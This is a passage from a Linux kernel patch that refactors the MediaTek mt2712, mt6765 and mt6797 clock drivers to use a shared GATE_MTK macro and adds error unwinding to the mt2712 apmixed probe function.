+-#define GATE_BDP(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &bdp_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_BDP(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &bdp_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate bdp_clks[] = {
+ 	GATE_BDP(CLK_BDP_BRIDGE_B, "bdp_bridge_b", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-img.c b/drivers/clk/mediatek/clk-mt2712-img.c
+index 335049cdc856c..3ffa51384e6b2 100644
+--- a/drivers/clk/mediatek/clk-mt2712-img.c
++++ b/drivers/clk/mediatek/clk-mt2712-img.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_SMI_LARB2, "img_smi_larb2", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-jpgdec.c b/drivers/clk/mediatek/clk-mt2712-jpgdec.c
+index 07ba7c5e80aff..8c768d5ce24d5 100644
+--- a/drivers/clk/mediatek/clk-mt2712-jpgdec.c
++++ b/drivers/clk/mediatek/clk-mt2712-jpgdec.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs jpgdec_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_JPGDEC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &jpgdec_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_JPGDEC(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &jpgdec_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate jpgdec_clks[] = {
+ 	GATE_JPGDEC(CLK_JPGDEC_JPGDEC1, "jpgdec_jpgdec1", "jpgdec_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-mfg.c b/drivers/clk/mediatek/clk-mt2712-mfg.c
+index 42f8cf3ecf4cb..8949315c2dd20 100644
+--- a/drivers/clk/mediatek/clk-mt2712-mfg.c
++++ b/drivers/clk/mediatek/clk-mt2712-mfg.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs mfg_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_MFG(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mfg_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MFG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &mfg_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mfg_clks[] = {
+ 	GATE_MFG(CLK_MFG_BG3D, "mfg_bg3d", "mfg_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-mm.c b/drivers/clk/mediatek/clk-mt2712-mm.c
+index 7d44b09b8a0a7..ad6daa8f28a83 100644
+--- a/drivers/clk/mediatek/clk-mt2712-mm.c
++++ b/drivers/clk/mediatek/clk-mt2712-mm.c
+@@ -30,32 +30,14 @@ static const struct mtk_gate_regs mm2_cg_regs = {
+ 	.sta_ofs = 0x220,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
+-
+-#define GATE_MM1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
+-
+-#define GATE_MM2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM2(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	/* MM0 */
+diff --git a/drivers/clk/mediatek/clk-mt2712-vdec.c b/drivers/clk/mediatek/clk-mt2712-vdec.c
+index 6296ed5c5b555..572290dd43c87 100644
+--- a/drivers/clk/mediatek/clk-mt2712-vdec.c
++++ b/drivers/clk/mediatek/clk-mt2712-vdec.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x8,
+ };
+ 
+-#define GATE_VDEC0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] = {
+ 	/* VDEC0 */
+diff --git a/drivers/clk/mediatek/clk-mt2712-venc.c b/drivers/clk/mediatek/clk-mt2712-venc.c
+index b9bfc35de629c..9588eb03016eb 100644
+--- a/drivers/clk/mediatek/clk-mt2712-venc.c
++++ b/drivers/clk/mediatek/clk-mt2712-venc.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs venc_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_VENC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &venc_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VENC(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &venc_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate venc_clks[] = {
+ 	GATE_VENC(CLK_VENC_SMI_COMMON_CON, "venc_smi", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712.c b/drivers/clk/mediatek/clk-mt2712.c
+index 56980dd6c2eaf..d6c2cc183b1a1 100644
+--- a/drivers/clk/mediatek/clk-mt2712.c
++++ b/drivers/clk/mediatek/clk-mt2712.c
+@@ -958,23 +958,11 @@ static const struct mtk_gate_regs top1_cg_regs = {
+ 	.sta_ofs = 0x424,
+ };
+ 
+-#define GATE_TOP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate top_clks[] = {
+ 	/* TOP0 */
+@@ -998,14 +986,8 @@ static const struct mtk_gate_regs infra_cg_regs = {
+ 	.sta_ofs = 0x48,
+ };
+ 
+-#define GATE_INFRA(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &infra_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_INFRA(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate infra_clks[] = {
+ 	GATE_INFRA(CLK_INFRA_DBGCLK, "infra_dbgclk", "axi_sel", 0),
+@@ -1035,32 +1017,14 @@ static const struct mtk_gate_regs peri2_cg_regs = {
+ 	.sta_ofs = 0x42c,
+ };
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_PERI2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate peri_clks[] = {
+ 	/* PERI0 */
+@@ -1283,15 +1247,25 @@ static int clk_mt2712_apmixed_probe(struct platform_device *pdev)
+ 	struct device_node *node = pdev->dev.of_node;
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_APMIXED_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+-	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
++	r = mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
++	if (r)
++		goto free_clk_data;
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
++	if (r) {
++		dev_err(&pdev->dev, "Cannot register clock provider: %d\n", r);
++		goto unregister_plls;
++	}
+ 
+-	if (r != 0)
+-		pr_err("%s(): could not register clock provider: %d\n",
+-			__func__, r);
++	return 0;
+ 
++unregister_plls:
++	mtk_clk_unregister_plls(plls, ARRAY_SIZE(plls), clk_data);
++free_clk_data:
++	mtk_free_clk_data(clk_data);
+ 	return r;
+ }
+ 
+diff --git a/drivers/clk/mediatek/clk-mt6765-audio.c b/drivers/clk/mediatek/clk-mt6765-audio.c
+index 0aa6c0d352ca5..5682e0302eee2 100644
+--- a/drivers/clk/mediatek/clk-mt6765-audio.c
++++ b/drivers/clk/mediatek/clk-mt6765-audio.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs audio1_cg_regs = {
+ 	.sta_ofs = 0x4,
+ };
+ 
+-#define GATE_AUDIO0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio0_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio1_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate audio_clks[] = {
+ 	/* AUDIO0 */
+diff --git a/drivers/clk/mediatek/clk-mt6765-cam.c b/drivers/clk/mediatek/clk-mt6765-cam.c
+index 25f2bef38126e..6e7d192c19cb0 100644
+--- a/drivers/clk/mediatek/clk-mt6765-cam.c
++++ b/drivers/clk/mediatek/clk-mt6765-cam.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs cam_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_CAM(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &cam_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_CAM(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &cam_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate cam_clks[] = {
+ 	GATE_CAM(CLK_CAM_LARB3, "cam_larb3", "mm_ck", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6765-img.c b/drivers/clk/mediatek/clk-mt6765-img.c
+index a62303ef4f41d..cfbc907988aff 100644
+--- a/drivers/clk/mediatek/clk-mt6765-img.c
++++ b/drivers/clk/mediatek/clk-mt6765-img.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_LARB2, "img_larb2", "mm_ck", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6765-mipi0a.c b/drivers/clk/mediatek/clk-mt6765-mipi0a.c
+index 25c829fc38661..f2b9dc8084801 100644
+--- a/drivers/clk/mediatek/clk-mt6765-mipi0a.c
++++ b/drivers/clk/mediatek/clk-mt6765-mipi0a.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs mipi0a_cg_regs = {
+ 	.sta_ofs = 0x80,
+ };
+ 
+-#define GATE_MIPI0A(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mipi0a_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_MIPI0A(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &mipi0a_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate mipi0a_clks[] = {
+ 	GATE_MIPI0A(CLK_MIPI0A_CSR_CSI_EN_0A,
+diff --git a/drivers/clk/mediatek/clk-mt6765-mm.c b/drivers/clk/mediatek/clk-mt6765-mm.c
+index bda774668a361..a4570c9dbefa5 100644
+--- a/drivers/clk/mediatek/clk-mt6765-mm.c
++++ b/drivers/clk/mediatek/clk-mt6765-mm.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs mm_cg_regs = {
+ 	.sta_ofs = 0x100,
+ };
+ 
+-#define GATE_MM(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MM(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	/* MM */
+diff --git a/drivers/clk/mediatek/clk-mt6765-vcodec.c b/drivers/clk/mediatek/clk-mt6765-vcodec.c
+index 2bc1fbde87da9..75d72b9b4032c 100644
+--- a/drivers/clk/mediatek/clk-mt6765-vcodec.c
++++ b/drivers/clk/mediatek/clk-mt6765-vcodec.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs venc_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_VENC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &venc_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VENC(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &venc_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate venc_clks[] = {
+ 	GATE_VENC(CLK_VENC_SET0_LARB, "venc_set0_larb", "mm_ck", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6765.c b/drivers/clk/mediatek/clk-mt6765.c
+index e9b9e67297335..665981fc411f5 100644
+--- a/drivers/clk/mediatek/clk-mt6765.c
++++ b/drivers/clk/mediatek/clk-mt6765.c
+@@ -483,32 +483,14 @@ static const struct mtk_gate_regs top2_cg_regs = {
+ 	.sta_ofs = 0x320,
+ };
+ 
+-#define GATE_TOP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_TOP2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate top_clks[] = {
+ 	/* TOP0 */
+@@ -559,41 +541,17 @@ static const struct mtk_gate_regs ifr5_cg_regs = {
+ 	.sta_ofs = 0xc8,
+ };
+ 
+-#define GATE_IFR2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_IFR3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR3(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr3_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_IFR4(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr4_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR4(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr4_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_IFR5(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr5_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR5(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr5_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate ifr_clks[] = {
+ 	/* INFRA_TOPAXI */
+@@ -674,14 +632,8 @@ static const struct mtk_gate_regs apmixed_cg_regs = {
+ 	.sta_ofs = 0x14,
+ };
+ 
+-#define GATE_APMIXED(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &apmixed_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,		\
+-	}
++#define GATE_APMIXED(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &apmixed_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate apmixed_clks[] = {
+ 	/* AUDIO0 */
+diff --git a/drivers/clk/mediatek/clk-mt6797-img.c b/drivers/clk/mediatek/clk-mt6797-img.c
+index 7c6a53fbb8be6..06441393478f6 100644
+--- a/drivers/clk/mediatek/clk-mt6797-img.c
++++ b/drivers/clk/mediatek/clk-mt6797-img.c
+@@ -16,14 +16,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0000,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_FDVT, "img_fdvt", "mm_sel", 11),
+diff --git a/drivers/clk/mediatek/clk-mt6797-mm.c b/drivers/clk/mediatek/clk-mt6797-mm.c
+index 0846011fc8943..99a63f46642fa 100644
+--- a/drivers/clk/mediatek/clk-mt6797-mm.c
++++ b/drivers/clk/mediatek/clk-mt6797-mm.c
+@@ -23,23 +23,11 @@ static const struct mtk_gate_regs mm1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {			\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
+-	.regs = &mm0_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr,		\
+-}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_MM1(_id, _name, _parent, _shift) {			\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
+-	.regs = &mm1_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr,		\
+-}
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	GATE_MM0(CLK_MM_SMI_COMMON, "mm_smi_common", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6797-vdec.c b/drivers/clk/mediatek/clk-mt6797-vdec.c
+index 6120fccc859f1..8622ddd87a5bb 100644
+--- a/drivers/clk/mediatek/clk-mt6797-vdec.c
++++ b/drivers/clk/mediatek/clk-mt6797-vdec.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x0008,
+ };
+ 
+-#define GATE_VDEC0(_id, _name, _parent, _shift) {		\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
+-	.regs = &vdec0_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr_inv,		\
+-}
++#define GATE_VDEC0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1(_id, _name, _parent, _shift) {		\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
+-	.regs = &vdec1_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr_inv,		\
+-}
++#define GATE_VDEC1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] = {
+ 	GATE_VDEC0(CLK_VDEC_CKEN_ENG, "vdec_cken_eng", "vdec_sel", 8),
+diff --git a/drivers/clk/mediatek/clk-mt6797-venc.c b/drivers/clk/mediatek/clk-mt6797-venc.c
+index 834d3834d2bbc..928d611a476e4 100644
+--- a/drivers/clk/mediatek/clk-mt6797-venc.c
++++ b/drivers/clk/mediatek/clk-mt6797-venc.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs venc_cg_regs = {
+ 	.sta_ofs = 0x0000,
+ };
+ 
+-#define GATE_VENC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &venc_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VENC(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &venc_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate venc_clks[] = {
+ 	GATE_VENC(CLK_VENC_0, "venc_0", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6797.c b/drivers/clk/mediatek/clk-mt6797.c
+index b89f325a4b9b8..78339cb35beb0 100644
+--- a/drivers/clk/mediatek/clk-mt6797.c
++++ b/drivers/clk/mediatek/clk-mt6797.c
+@@ -420,40 +420,22 @@ static const struct mtk_gate_regs infra2_cg_regs = {
+ 	.sta_ofs = 0x00b0,
+ };
+ 
+-#define GATE_ICG0(_id, _name, _parent, _shift) {		\
+-	.id = _id,						\
+-	.name = _name,						\
+-	.parent_name = _parent,					\
+-	.regs = &infra0_cg_regs,				\
+-	.shift = _shift,					\
+-	.ops = &mtk_clk_gate_ops_setclr,			\
+-}
++#define GATE_ICG0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_ICG1(_id, _name, _parent, _shift)			\
+-	GATE_ICG1_FLAGS(_id, _name, _parent, _shift, 0)
++#define GATE_ICG1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_ICG1_FLAGS(_id, _name, _parent, _shift, _flags) {	\
